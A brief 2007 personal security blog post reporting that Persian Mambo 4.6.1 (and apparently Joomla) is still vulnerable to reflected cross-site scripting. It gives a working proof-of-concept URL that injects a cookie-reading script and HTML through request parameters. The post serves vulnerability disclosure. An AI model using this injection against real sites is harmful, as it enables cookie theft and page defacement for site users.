This site is some kind of personal database gathering notes about my day-to-day discoveries in the IT world basically about security.
While some are howtos and tips (we learn a new thing every day eh), hopefully you'll find some of them informative !

January 22, 2007

Persian Mambo V4.6.1 still vulnerable to XSS!!!


I just install the latest Mambo version and run this script

http://localhost/mambo/index.php?option=com_content&task=view&id
=18&Itemid=39%22%3E<script>alert(document.cookie)</script
>&mosmsg=%3Ch1%3EHi,%20I%20am%20chr1x2%20,%20THIS
%20IS%20XSS%PROBLEM!!!%3C/h1%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3EThey said this is already fixed?
I also run the script in joomla.

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)